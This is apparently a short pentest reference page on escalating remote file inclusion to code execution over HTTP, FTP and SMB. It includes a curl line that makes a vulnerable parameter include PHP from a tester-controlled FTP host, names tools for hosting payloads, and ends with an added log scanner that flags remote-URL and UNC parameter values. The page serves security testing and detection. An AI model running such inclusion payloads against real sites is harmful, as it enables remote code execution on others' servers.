RFI to RCE
via HTTP
The tester can host arbitrary PHP code and access it through the HTTP protocol.
via FTP
The tester can also host arbitrary PHP code and access it through the FTP protocol. The Python library pyftpdlib can be used to start an FTP server.
PHP uses anonymous credentials to authenticate to the FTP server. If the tester needs to use custom credentials, they can be passed in the URL as follows:
curl '$URL/?parameter=ftp://user:pass@tester.server/phpinfo.php'
via SMB
Sometimes, the vulnerable web application is hosted on a Windows Server, meaning the attacker could log into an SMB server to store the arbitrary PHP code.
Impacket's smbserver.py (Python) script can be used on the attacker-controlled machine to create an SMB server.
The PHP script can then be included by using a UNC path.
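From the defender's side, all three channels above (HTTP, FTP, SMB/UNC) appear in the web server's access log as a remote location inside a request parameter. The following is an added example, not part of the original page, that flags such values; the function names are hypothetical and the log lines are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Remote locations matching the three channels described on this page.
URL_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.I)
UNC_RE = re.compile(r'^(\\\\|//)[^\\/]+[\\/]')  # \\host\share or //host/share

def classify(value):
    """Return 'http', 'ftp', 'smb' or None for one parameter value."""
    # Logged values may be encoded more than once; decode until stable.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    m = URL_SCHEME_RE.match(value)
    if m:
        return 'ftp' if m.group(1).lower() == 'ftp' else 'http'
    if UNC_RE.match(value):
        return 'smb'
    return None

def scan(lines):
    """Yield (line_no, parameter, channel) for every flagged parameter."""
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            channel = classify(value)
            if channel:
                yield no, name, channel

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=http%3A%2F%2Fhost.example%2Fa.php HTTP/1.1" 200 90',
    '192.0.2.11 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=ftp%253A%252F%252Fuser%253Apass%2540host.example%252Fa.php HTTP/1.1" 200 90',
    '192.0.2.11 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=%5C%5C192.0.2.20%5Cshare%5Ca.php HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Parameters that legitimately carry URLs (redirect targets, for example) will also match and need an allowlist.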